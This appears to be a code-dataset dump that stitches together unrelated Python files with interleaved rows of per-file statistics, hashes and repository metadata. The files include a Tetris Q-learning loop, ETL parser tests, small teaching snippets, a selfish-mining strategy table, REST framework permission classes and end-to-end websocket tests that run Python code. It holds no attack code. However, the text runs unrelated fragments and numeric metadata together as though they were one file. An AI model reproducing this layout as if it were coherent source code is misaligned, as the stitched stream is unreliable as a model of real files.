                    + gamma * np.amax(qtable[new_state_key])
                    - qtable[game_state_key][1]
                )
            # print(np.array(list(qtable.values())))
            game_state = new_state
        elif key == ord(" "):
            # bottom (hard drop) - no Q update is performed for this action
            game_state, reward, is_end, debug = env.step(Action_Type.Bottom)
            # print(f"reward [{reward}], is_end [{is_end}]")
            if debug is not None:
                debug_img = create_image_from_state(debug)
                debug_img = cv2.cvtColor(debug_img, cv2.COLOR_BGR2RGB)
        elif key == ord("i"):
            print("#### iteration count is", itr_count)
            print(np.array(list(qtable.values())))
    cv2.destroyAllWindows()
def visual_train():
    """Interactive play/train loop: a/d/w/s move the piece while a tabular
    Q table is updated; space hard-drops (printing and clearing the recorded
    ``action_list``), i prints the Q table, q/ESC quits.

    Mirrors sample(), but every prospective Q-value update is printed before
    being applied so it can be inspected.
    """
    lr = 0.8      # learning rate
    gamma = 0.95  # discount factor
    qtable = {}   # hex state key -> list of per-action Q values
    env = tetris_engine([Block_Type.L])
    game_state = env.reset()
    debug_img = None
    is_end = False
    while True:
        img = create_image_from_state(game_state)
        # img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
        cv2.imshow("frame", img)
        if debug_img is not None:
            cv2.imshow("debug", debug_img)
        key = cv2.waitKey(20)
        # press Q or ESC
        if key == ord("q") or key == 27:
            break
        if is_end:
            # Episode over: start a fresh game before processing more input.
            env = tetris_engine([Block_Type.L])
            game_state = env.reset()
            debug_img = None
            is_end = False
            continue
        game_state_key = game_state.tobytes().hex()
        if game_state_key not in qtable:
            qtable[game_state_key] = [state_init_value] * env.action_space
        if key == ord("w"):
            # rotate (action index 2)
            new_state, reward, is_end, debug = env.step(Action_Type.Rotate)
            new_state_key = new_state.tobytes().hex()
            print(f"reward [{reward}], is_end [{is_end}]")
            if debug is not None:
                debug_img = create_image_from_state(debug)
                debug_img = cv2.cvtColor(debug_img, cv2.COLOR_BGR2RGB)
            # Q(s,a):= Q(s,a) + lr [R(s,a) + gamma * max Q(s',a') - Q(s,a)]
            if new_state_key not in qtable:
                qtable[new_state_key] = [state_init_value] * env.action_space
            # For moves that leave the state unchanged, skipping the Q-value
            # update makes the resulting Q table more robust.
            if new_state_key != game_state_key:
                # Show the would-be new Q value before committing it.
                print(
                    reward,
                    qtable[game_state_key][2]
                    + lr
                    * (
                        reward
                        + gamma * np.amax(qtable[new_state_key])
                        - qtable[game_state_key][2]
                    ),
                )
                qtable[game_state_key][2] = qtable[game_state_key][2] + lr * (
                    reward
                    + gamma * np.amax(qtable[new_state_key])
                    - qtable[game_state_key][2]
                )
            # print(np.array(list(qtable.values())))
            action_list.append(2)
            game_state = new_state
            # print(game_state)
        elif key == ord("s"):
            # down (action index 3)
            new_state, reward, is_end, debug = env.step(Action_Type.Down)
            new_state_key = new_state.tobytes().hex()
            print(f"reward [{reward}], is_end [{is_end}]")
            if debug is not None:
                debug_img = create_image_from_state(debug)
                debug_img = cv2.cvtColor(debug_img, cv2.COLOR_BGR2RGB)
            if not is_end:
                # Q(s,a):= Q(s,a) + lr [R(s,a) + gamma * max Q(s',a') - Q(s,a)]
                if new_state_key not in qtable:
                    qtable[new_state_key] = [state_init_value] * env.action_space
                # For moves that leave the state unchanged, skipping the
                # Q-value update makes the resulting Q table more robust.
                if new_state_key != game_state_key:
                    # Show the would-be new Q value before committing it.
                    print(
                        reward,
                        qtable[game_state_key][3]
                        + lr
                        * (
                            reward
                            + gamma * np.amax(qtable[new_state_key])
                            - qtable[game_state_key][3]
                        ),
                    )
                    qtable[game_state_key][3] = qtable[game_state_key][3] + lr * (
                        reward
                        + gamma * np.amax(qtable[new_state_key])
                        - qtable[game_state_key][3]
                    )
            # print(np.array(list(qtable.values())))
            action_list.append(3)
            game_state = new_state
            # print(game_state)
        elif key == ord("a"):
            # left (action index 0)
            new_state, reward, is_end, debug = env.step(Action_Type.Left_Down)
            new_state_key = new_state.tobytes().hex()
            print(f"reward [{reward}], is_end [{is_end}]")
            if debug is not None:
                debug_img = create_image_from_state(debug)
                debug_img = cv2.cvtColor(debug_img, cv2.COLOR_BGR2RGB)
            # Q(s,a):= Q(s,a) + lr [R(s,a) + gamma * max Q(s',a') - Q(s,a)]
            if new_state_key not in qtable:
                qtable[new_state_key] = [state_init_value] * env.action_space
            # For moves that leave the state unchanged, skipping the Q-value
            # update makes the resulting Q table more robust.
            if new_state_key != game_state_key:
                # Show the would-be new Q value before committing it.
                print(
                    reward,
                    qtable[game_state_key][0]
                    + lr
                    * (
                        reward
                        + gamma * np.amax(qtable[new_state_key])
                        - qtable[game_state_key][0]
                    ),
                )
                qtable[game_state_key][0] = qtable[game_state_key][0] + lr * (
                    reward
                    + gamma * np.amax(qtable[new_state_key])
                    - qtable[game_state_key][0]
                )
            else:
                print("not allowed operation", reward)
            # print(np.array(list(qtable.values())))
            action_list.append(0)
            game_state = new_state
        elif key == ord("d"):
            # right (action index 1)
            new_state, reward, is_end, debug = env.step(Action_Type.Right_Down)
            new_state_key = new_state.tobytes().hex()
            print(f"reward [{reward}], is_end [{is_end}]")
            if debug is not None:
                debug_img = create_image_from_state(debug)
                debug_img = cv2.cvtColor(debug_img, cv2.COLOR_BGR2RGB)
            # Q(s,a):= Q(s,a) + lr [R(s,a) + gamma * max Q(s',a') - Q(s,a)]
            if new_state_key not in qtable:
                qtable[new_state_key] = [state_init_value] * env.action_space
            # For moves that leave the state unchanged, skipping the Q-value
            # update makes the resulting Q table more robust.
            if new_state_key != game_state_key:
                # Show the would-be new Q value before committing it.
                print(
                    reward,
                    qtable[game_state_key][1]
                    + lr
                    * (
                        reward
                        + gamma * np.amax(qtable[new_state_key])
                        - qtable[game_state_key][1]
                    ),
                )
                qtable[game_state_key][1] = qtable[game_state_key][1] + lr * (
                    reward
                    + gamma * np.amax(qtable[new_state_key])
                    - qtable[game_state_key][1]
                )
            # print(np.array(list(qtable.values())))
            action_list.append(1)
            game_state = new_state
        elif key == ord(" "):
            # bottom (hard drop) - no Q update; dump and reset the action log
            game_state, reward, is_end, debug = env.step(Action_Type.Bottom)
            # print(f"reward [{reward}], is_end [{is_end}]")
            if debug is not None:
                debug_img = create_image_from_state(debug)
                debug_img = cv2.cvtColor(debug_img, cv2.COLOR_BGR2RGB)
            print(action_list)
            action_list.clear()
        elif key == ord("i"):
            print(np.array(list(qtable.values())))
    cv2.destroyAllWindows()
if __name__ == "__main__":
    # Run the interactive session by default; switch to sample() to replay
    # the pre-recorded action sequences instead.
    visual_train()
    # sample()
| 33.961039
| 83
| 0.454175
| 1,794
| 15,690
| 3.722408
| 0.069677
| 0.109015
| 0.084456
| 0.09434
| 0.900719
| 0.891884
| 0.890836
| 0.890087
| 0.874513
| 0.860737
| 0
| 0.026535
| 0.440344
| 15,690
| 461
| 84
| 34.034707
| 0.733971
| 0.108923
| 0
| 0.85347
| 0
| 0
| 0.018418
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.005141
| false
| 0
| 0.012853
| 0
| 0.017995
| 0.033419
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
415f9471dc00a3af92c72c628164a43c5e20ab27
| 82
|
py
|
Python
|
src/chapter24/__init__.py
|
Peefy/CLRS_dugu_code-master
|
98f00e75e1b0ebc13a7affb2604bec8501692a19
|
[
"Apache-2.0"
] | 3
|
2018-01-31T03:08:50.000Z
|
2018-04-25T12:57:01.000Z
|
src/chapter24/__init__.py
|
HideLakitu/IntroductionToAlgorithm.Python
|
33662f46dc346203b220d7481d1a4439feda05d2
|
[
"Apache-2.0"
] | null | null | null |
src/chapter24/__init__.py
|
HideLakitu/IntroductionToAlgorithm.Python
|
33662f46dc346203b220d7481d1a4439feda05d2
|
[
"Apache-2.0"
] | 3
|
2019-03-03T04:49:53.000Z
|
2020-07-13T10:18:58.000Z
|
# python src/chapter24/chapter24note.py
# python3 src/chapter24/chapter24note.py
| 20.5
| 40
| 0.817073
| 10
| 82
| 6.7
| 0.6
| 0.358209
| 0.746269
| 0.80597
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.12
| 0.085366
| 82
| 3
| 41
| 27.333333
| 0.773333
| 0.926829
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4171b316e1944fa2e2b2f4752060fd53f230c3a1
| 2,439
|
py
|
Python
|
tests/test_mof_image_parser.py
|
IMULMUL/etl-parser
|
76b7c046866ce0469cd129ee3f7bb3799b34e271
|
[
"Apache-2.0"
] | 104
|
2020-03-04T14:31:31.000Z
|
2022-03-28T02:59:36.000Z
|
tests/test_mof_image_parser.py
|
IMULMUL/etl-parser
|
76b7c046866ce0469cd129ee3f7bb3799b34e271
|
[
"Apache-2.0"
] | 7
|
2020-04-20T09:18:39.000Z
|
2022-03-19T17:06:19.000Z
|
tests/test_mof_image_parser.py
|
IMULMUL/etl-parser
|
76b7c046866ce0469cd129ee3f7bb3799b34e271
|
[
"Apache-2.0"
] | 16
|
2020-03-05T18:55:59.000Z
|
2022-03-01T10:19:28.000Z
|
# -*- coding: utf-8 -*-
import unittest
from etl.parsers.kernel.core import build_mof
from etl.parsers.kernel.image import ImageLoad
from etl.wmi import EventTraceGroup
class TestMofImageParser(unittest.TestCase):
    """Check that kernel image-load MOF payloads parse into ImageLoad events."""

    def test_image_load_type2(self):
        """
        Test Parsing image load event when type is 2
        """
        # Raw event payload captured from an ETL trace; the tail is a
        # UTF-16LE image path (\Device\HarddiskVolume4\Windows\System32\gdi32.dll).
        payload = b'\x00\x00\xdc\x81\xfe\x7f\x00\x00\x00`\x02\x00\x00\x00\x00\x00\xcc\x01\x00\x00c\xf7\x02\x00\x00\x00\x00\x00\x0c\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\\\x00D\x00e\x00v\x00i\x00c\x00e\x00\\\x00H\x00a\x00r\x00d\x00d\x00i\x00s\x00k\x00V\x00o\x00l\x00u\x00m\x00e\x004\x00\\\x00W\x00i\x00n\x00d\x00o\x00w\x00s\x00\\\x00S\x00y\x00s\x00t\x00e\x00m\x003\x002\x00\\\x00g\x00d\x00i\x003\x002\x00.\x00d\x00l\x00l\x00\x00\x00'
        # Group IMAGE, version 3, event type 2.
        mof = build_mof(EventTraceGroup.EVENT_TRACE_GROUP_IMAGE, 3, 2, payload)
        self.assertIsInstance(mof, ImageLoad)

    def test_image_load_type3(self):
        """
        Test Parsing image load event when type is 3
        """
        # Payload ends with UTF-16LE path \SystemRoot\system32\ntoskrnl.exe.
        payload = b'\x00\x00`m\x03\xf8\xff\xff\x00`\xab\x00\x00\x00\x00\x00\x00\x00\x00\x00\x91\x05\x98\x00\x90\xa7iB\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\\\x00S\x00y\x00s\x00t\x00e\x00m\x00R\x00o\x00o\x00t\x00\\\x00s\x00y\x00s\x00t\x00e\x00m\x003\x002\x00\\\x00n\x00t\x00o\x00s\x00k\x00r\x00n\x00l\x00.\x00e\x00x\x00e\x00\x00\x00'
        # Group IMAGE, version 3, event type 3; the parser must also expose
        # the decoded file name.
        mof = build_mof(EventTraceGroup.EVENT_TRACE_GROUP_IMAGE, 3, 3, payload)
        self.assertIsInstance(mof, ImageLoad)
        self.assertEqual(mof.get_image_filename(), '\\SystemRoot\\system32\\ntoskrnl.exe')

    def test_image_load_type4(self):
        """
        Test Parsing image load event when type is 4
        """
        # Same image as type 3; only the event type differs.
        payload = b'\x00\x00`m\x03\xf8\xff\xff\x00`\xab\x00\x00\x00\x00\x00\x00\x00\x00\x00\x91\x05\x98\x00\x90\xa7iB\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\\\x00S\x00y\x00s\x00t\x00e\x00m\x00R\x00o\x00o\x00t\x00\\\x00s\x00y\x00s\x00t\x00e\x00m\x003\x002\x00\\\x00n\x00t\x00o\x00s\x00k\x00r\x00n\x00l\x00.\x00e\x00x\x00e\x00\x00\x00'
        mof = build_mof(EventTraceGroup.EVENT_TRACE_GROUP_IMAGE, 3, 4, payload)
        self.assertIsInstance(mof, ImageLoad)
        self.assertEqual(mof.get_image_filename(), '\\SystemRoot\\system32\\ntoskrnl.exe')
| 67.75
| 502
| 0.711357
| 425
| 2,439
| 4.021176
| 0.209412
| 0.386191
| 0.505559
| 0.59684
| 0.737858
| 0.715038
| 0.692218
| 0.692218
| 0.692218
| 0.623757
| 0
| 0.257394
| 0.112751
| 2,439
| 35
| 503
| 69.685714
| 0.532348
| 0.064371
| 0
| 0.368421
| 0
| 0.157895
| 0.598101
| 0.598101
| 0
| 0
| 0
| 0
| 0.263158
| 1
| 0.157895
| false
| 0
| 0.210526
| 0
| 0.421053
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
41870690877ca954f30710a758cdb0b58b2c9c98
| 284
|
py
|
Python
|
python/curso_em_video/teste16.py
|
Bharreto/Ola-Mundo
|
a1d4fb9b9ce28f36b9fd31bcecbaa397cdca09a7
|
[
"MIT"
] | 1
|
2020-04-02T08:54:36.000Z
|
2020-04-02T08:54:36.000Z
|
python/curso_em_video/teste16.py
|
Bharreto/Ola-Mundo
|
a1d4fb9b9ce28f36b9fd31bcecbaa397cdca09a7
|
[
"MIT"
] | null | null | null |
python/curso_em_video/teste16.py
|
Bharreto/Ola-Mundo
|
a1d4fb9b9ce28f36b9fd31bcecbaa397cdca09a7
|
[
"MIT"
] | null | null | null |
from math import trunc
# Read a number and report it together with its integer part.
num = float (input("Digite um valor-"))
# NOTE: {:.0f} ROUNDS num for display, while trunc(num) drops the fraction,
# so the two printed values can disagree (e.g. 2.7 -> "3 ... 2").
print ("O valor digitado foi {:.0f} e a sua porção inteira é {}".format(num, trunc(num)))
# Alternative version kept as a (non-executed) string literal; it uses int()
# instead of trunc() and prints the value unrounded.
'''num = float(input("Digite um valor- "))
print ("O valor digitado foi {} e a sua porção inteira é {}".format (num, int(num)))'''
| 47.333333
| 89
| 0.658451
| 47
| 284
| 3.978723
| 0.489362
| 0.085562
| 0.139037
| 0.203209
| 0.812834
| 0.812834
| 0.812834
| 0.812834
| 0.513369
| 0.513369
| 0
| 0.004184
| 0.158451
| 284
| 6
| 90
| 47.333333
| 0.778243
| 0
| 0
| 0
| 0
| 0
| 0.458065
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.333333
| 0
| 0.333333
| 0.333333
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
419dd030eac6f221d9dcb06ed503b4cda641f0e4
| 439
|
py
|
Python
|
Py Learning/4. Operators/bitwiseOperator.py
|
MahmudX/TestSharp
|
62d0edfbc420c808ca50d25daaee8f26258c3c28
|
[
"MIT"
] | null | null | null |
Py Learning/4. Operators/bitwiseOperator.py
|
MahmudX/TestSharp
|
62d0edfbc420c808ca50d25daaee8f26258c3c28
|
[
"MIT"
] | null | null | null |
Py Learning/4. Operators/bitwiseOperator.py
|
MahmudX/TestSharp
|
62d0edfbc420c808ca50d25daaee8f26258c3c28
|
[
"MIT"
] | null | null | null |
# Bitwise-operator demo: XOR two nibbles and show the result in hex and
# binary.  Swap ^ for & (AND) or | (OR) to compare the other operators.
x = 0x0a
y = 0x05
z = x ^ y
print(f'Hex: x = {x:02X}, y = {y:02X}, z = {z:02X}')
print(f'Bin: x = {x:08b}, y = {y:08b}, z = {z:08b}')
| 25.823529
| 55
| 0.416856
| 93
| 439
| 1.967742
| 0.129032
| 0.196721
| 0.098361
| 0.131148
| 0.978142
| 0.978142
| 0.978142
| 0.978142
| 0.978142
| 0.978142
| 0
| 0.159875
| 0.273349
| 439
| 17
| 56
| 25.823529
| 0.413793
| 0.6082
| 0
| 0
| 0
| 0.4
| 0.575342
| 0
| 0
| 0
| 0.054795
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.4
| 0
| 0
| 1
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
68bec5f62665ea179108d683571a7b699a736f26
| 1,902
|
py
|
Python
|
code/selfish_proxy/strategy/strategies.py
|
simonmulser/master-thesis
|
5ca2ddda377a0eede5a3c50866e0f90292c5448f
|
[
"CC-BY-4.0"
] | null | null | null |
code/selfish_proxy/strategy/strategies.py
|
simonmulser/master-thesis
|
5ca2ddda377a0eede5a3c50866e0f90292c5448f
|
[
"CC-BY-4.0"
] | null | null | null |
code/selfish_proxy/strategy/strategies.py
|
simonmulser/master-thesis
|
5ca2ddda377a0eede5a3c50866e0f90292c5448f
|
[
"CC-BY-4.0"
] | 1
|
2019-06-05T09:10:30.000Z
|
2019-06-05T09:10:30.000Z
|
# Selfish-mining action table: three 10x10 matrices (irrelevant / relevant /
# match), indexed by the two chain lengths.  Cell symbols, judging by the
# names used below: 'w' wait, 'a' adopt(?), 'm' match(?), 'o' override(?),
# '*' no action -- NOTE(review): symbol semantics inferred, confirm upstream.
# The matrices are perfectly regular, so build them from their row formulas.

_SIZE = 10


def _irrelevant_row(r):
    # Row 0 is all wildcards; otherwise 'w' below the diagonal, '*' on it,
    # and 'a' immediately above it.
    if r == 0:
        return ['*'] * _SIZE
    return ['w' if c < r else 'a' if c == r + 1 else '*' for c in range(_SIZE)]


def _relevant_row(r):
    # Column 0 is always '*'; then (from the diagonal outwards):
    # 'a' just above, 'm' on, 'o' just below, 'w' further below.
    cells = []
    for c in range(_SIZE):
        if c == 0:
            cells.append('*')
        elif c == r + 1:
            cells.append('a')
        elif c == r:
            cells.append('m')
        elif c == r - 1:
            cells.append('o')
        elif c < r - 1:
            cells.append('w')
        else:
            cells.append('*')
    return cells


def _match_row(r):
    # Rows 0 and 1 are all wildcards; otherwise 'w' strictly between
    # column 0 and the diagonal.
    return ['w' if 1 <= c <= r - 1 else '*' for c in range(_SIZE)]


selfish_mining_strategy = [
    [_irrelevant_row(r) for r in range(_SIZE)],  # irrelevant
    [_relevant_row(r) for r in range(_SIZE)],    # relevant
    [_match_row(r) for r in range(_SIZE)],       # match
]
| 47.55
| 59
| 0.099369
| 149
| 1,902
| 1.255034
| 0.067114
| 0.983957
| 1.235294
| 1.368984
| 0.721925
| 0.721925
| 0.684492
| 0.684492
| 0.620321
| 0.614973
| 0
| 0
| 0.307045
| 1,902
| 39
| 60
| 48.769231
| 0.141882
| 0.013144
| 0
| 0.128205
| 0
| 0
| 0.160171
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
68fcbc0ec22689b63906da7a3c560b132c171c8e
| 680
|
py
|
Python
|
backend/permissions.py
|
saad4software/MMSS-Backend
|
fddb2ff94eab905df321dd0ce574b7ae787f067d
|
[
"Apache-2.0"
] | null | null | null |
backend/permissions.py
|
saad4software/MMSS-Backend
|
fddb2ff94eab905df321dd0ce574b7ae787f067d
|
[
"Apache-2.0"
] | null | null | null |
backend/permissions.py
|
saad4software/MMSS-Backend
|
fddb2ff94eab905df321dd0ce574b7ae787f067d
|
[
"Apache-2.0"
] | null | null | null |
from rest_framework import permissions
from .models import User
class IsCounter(permissions.BasePermission):
    """Grant access to counter ('C') and admin ('A') users only."""

    def has_permission(self, request, view):
        role = getattr(request.user, 'role', None)
        return role == 'C' or role == 'A'
class IsGuest(permissions.BasePermission):
    """Grant access to guest ('G'), counter ('C') and admin ('A') users."""

    def has_permission(self, request, view):
        role = getattr(request.user, 'role', None)
        return role == 'G' or role == 'C' or role == 'A'
class IsAdmin(permissions.BasePermission):
    """Grant access to admin ('A') users only."""

    def has_permission(self, request, view):
        return getattr(request.user, 'role', None) == 'A'
| 34
| 97
| 0.675
| 84
| 680
| 5.416667
| 0.309524
| 0.217582
| 0.296703
| 0.204396
| 0.810989
| 0.810989
| 0.810989
| 0.810989
| 0.810989
| 0.810989
| 0
| 0
| 0.195588
| 680
| 19
| 98
| 35.789474
| 0.83181
| 0
| 0
| 0.384615
| 0
| 0
| 0.026471
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.230769
| false
| 0
| 0.153846
| 0.230769
| 0.846154
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 11
|
ec1d7aeaa0df4f31ad494082b0d15b8df033953d
| 152
|
py
|
Python
|
analysis/reciprocity.py
|
LuudJanssen/evolving-network-analysis
|
a392cbc737ca02c1ca9d033bd858dbc60e57f757
|
[
"Apache-2.0"
] | null | null | null |
analysis/reciprocity.py
|
LuudJanssen/evolving-network-analysis
|
a392cbc737ca02c1ca9d033bd858dbc60e57f757
|
[
"Apache-2.0"
] | null | null | null |
analysis/reciprocity.py
|
LuudJanssen/evolving-network-analysis
|
a392cbc737ca02c1ca9d033bd858dbc60e57f757
|
[
"Apache-2.0"
] | null | null | null |
from graph_tool.topology import edge_reciprocity
# Returns a graph's edge reciprocity
def graph_reciprocity(graph):
    """Return the edge reciprocity of *graph*.

    Thin wrapper around graph_tool's ``edge_reciprocity``; *graph* is
    expected to be a graph_tool Graph.
    """
    return edge_reciprocity(graph)
| 25.333333
| 48
| 0.822368
| 21
| 152
| 5.761905
| 0.571429
| 0.371901
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.125
| 152
| 6
| 49
| 25.333333
| 0.909774
| 0.223684
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
ec301e80925b03fb1d02df4454805a482095c436
| 98
|
py
|
Python
|
pipeline/__init__.py
|
prashanthsandela/python-pipeline
|
1f6a2ea766b80dc7d4c075b90cb204591bf44981
|
[
"Apache-2.0"
] | 1
|
2021-12-28T06:43:44.000Z
|
2021-12-28T06:43:44.000Z
|
pipeline/__init__.py
|
prashanthsandela/python-pipeline
|
1f6a2ea766b80dc7d4c075b90cb204591bf44981
|
[
"Apache-2.0"
] | null | null | null |
pipeline/__init__.py
|
prashanthsandela/python-pipeline
|
1f6a2ea766b80dc7d4c075b90cb204591bf44981
|
[
"Apache-2.0"
] | null | null | null |
from pipeline.pipeline import Pipeline as Pipeline
from pipeline.pipeline import Stream as Stream
| 32.666667
| 50
| 0.857143
| 14
| 98
| 6
| 0.357143
| 0.285714
| 0.47619
| 0.619048
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.122449
| 98
| 2
| 51
| 49
| 0.976744
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
ec438070869d44f0676c75f3767ae905b194a591
| 13,899
|
py
|
Python
|
tests/e2e/test_run_py.py
|
pi-top/Further-Link
|
9356fa719ee706fce68859c82ab89694f2497975
|
[
"Apache-2.0"
] | null | null | null |
tests/e2e/test_run_py.py
|
pi-top/Further-Link
|
9356fa719ee706fce68859c82ab89694f2497975
|
[
"Apache-2.0"
] | 20
|
2021-08-11T19:08:59.000Z
|
2022-03-21T20:14:41.000Z
|
tests/e2e/test_run_py.py
|
pi-top/pt-further-link
|
9356fa719ee706fce68859c82ab89694f2497975
|
[
"Apache-2.0"
] | null | null | null |
import asyncio
import os
from datetime import datetime
from shutil import copy
import aiohttp
import pytest
from further_link import __version__
from further_link.util.message import create_message, parse_message
from ..dirs import WORKING_DIRECTORY
from . import E2E_PATH, RUN_PY_URL
from .helpers import receive_data, wait_for_data
@pytest.mark.asyncio
async def test_bad_message(run_py_ws_client):
    """A 'start' command without a payload is rejected with 'Bad message'."""
    start_cmd = create_message("start")
    await run_py_ws_client.send_str(start_cmd)
    await wait_for_data(run_py_ws_client, "error", "message", "Bad message")
@pytest.mark.asyncio
async def test_run_code_script(run_py_ws_client):
    """Inline source ('sourceScript') runs and streams stdout and exit code."""
    code = """\
from datetime import datetime
print(datetime.now().strftime("%A"))
"""
    start_cmd = create_message("start", {"sourceScript": code})
    await run_py_ws_client.send_str(start_cmd)
    await receive_data(run_py_ws_client, "started")
    # The remote script prints the weekday name; compare with our own clock.
    day = datetime.now().strftime("%A")
    await wait_for_data(run_py_ws_client, "stdout", "output", day + "\n")
    await wait_for_data(run_py_ws_client, "stopped", "exitCode", 0)
@pytest.mark.asyncio
async def test_run_code_script_with_directory(run_py_ws_client):
    """Inline source still runs when an explicit 'directoryName' is given."""
    code = """\
from datetime import datetime
print(datetime.now().strftime("%A"))
"""
    start_cmd = create_message(
        "start", {"sourceScript": code, "directoryName": "my-dirname"}
    )
    await run_py_ws_client.send_str(start_cmd)
    await receive_data(run_py_ws_client, "started")
    day = datetime.now().strftime("%A")
    await wait_for_data(run_py_ws_client, "stdout", "output", day + "\n")
    await wait_for_data(run_py_ws_client, "stopped", "exitCode", 0)
@pytest.mark.asyncio
async def test_run_code_relative_path(run_py_ws_client):
    """A 'sourcePath' relative to the working directory is resolved and run."""
    # Place the fixture script where relative paths are resolved from.
    copy("{}/test_data/print_date.py".format(E2E_PATH), WORKING_DIRECTORY)
    start_cmd = create_message("start", {"sourcePath": "print_date.py"})
    await run_py_ws_client.send_str(start_cmd)
    await receive_data(run_py_ws_client, "started")
    day = datetime.now().strftime("%A")
    await wait_for_data(run_py_ws_client, "stdout", "output", day + "\n")
    await wait_for_data(run_py_ws_client, "stopped", "exitCode", 0)
@pytest.mark.asyncio
async def test_run_code_absolute_path(run_py_ws_client):
    """An absolute 'sourcePath' is accepted and run directly."""
    start_cmd = create_message(
        "start", {"sourcePath": "{}/test_data/print_date.py".format(E2E_PATH)}
    )
    await run_py_ws_client.send_str(start_cmd)
    await receive_data(run_py_ws_client, "started")
    day = datetime.now().strftime("%A")
    await wait_for_data(run_py_ws_client, "stdout", "output", day + "\n")
    await wait_for_data(run_py_ws_client, "stopped", "exitCode", 0)
@pytest.mark.asyncio
@pytest.mark.parametrize("query_params", [{"user": "root"}])
@pytest.mark.skip(reason="Won't work in CI due to old sudo version")
async def test_run_as_user(run_py_ws_client_query):
    """The process runs as the user named in the query string (here root)."""
    # This test assumes non-root user with nopasswd sudo access...
    code = "import getpass\nprint(getpass.getuser())"
    start_cmd = create_message("start", {"sourceScript": code})
    await run_py_ws_client_query.send_str(start_cmd)
    await receive_data(run_py_ws_client_query, "started")
    await wait_for_data(run_py_ws_client_query, "stdout", "output", "root\n")
    await wait_for_data(run_py_ws_client_query, "stopped", "exitCode", 0)
@pytest.mark.asyncio
async def test_stop_early(run_py_ws_client):
    """'stop' terminates a running infinite loop; exit code -15 is SIGTERM."""
    code = "while True: pass"
    start_cmd = create_message("start", {"sourceScript": code})
    await run_py_ws_client.send_str(start_cmd)
    await receive_data(run_py_ws_client, "started")
    stop_cmd = create_message("stop")
    await run_py_ws_client.send_str(stop_cmd)
    await wait_for_data(run_py_ws_client, "stopped", "exitCode", -15)
@pytest.mark.asyncio
async def test_bad_code(run_py_ws_client):
    """Invalid Python yields a stderr SyntaxError traceback and exit code 1."""
    code = "i'm not valid python"
